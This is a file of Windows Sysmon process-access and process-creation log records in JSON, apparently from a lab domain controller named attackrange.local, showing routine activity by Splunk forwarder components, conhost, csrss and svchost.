{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-00101D870900}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-00101D870900}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.178\r\nSourceProcessGUID: {41C8662E-2168-5F25-0000-00101D870900}\r\nSourceProcessId: 880\r\nSourceThreadId: 2264\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.178","SourceProcessGUID":"{41C8662E-2168-5F25-0000-00101D870900}","SourceProcessId":"880","SourceThreadId":"2264","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.571\r\nProcessGuid: {41C8662E-2168-5F25-0000-0010CF880900}\r\nProcessId: 4964\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.571","ProcessGuid":"{41C8662E-2168-5F25-0000-0010CF880900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-0010CF880900}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-0010CF880900}","TargetProcessId":"4964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-0010CF880900}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-0010CF880900}","TargetProcessId":"4964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
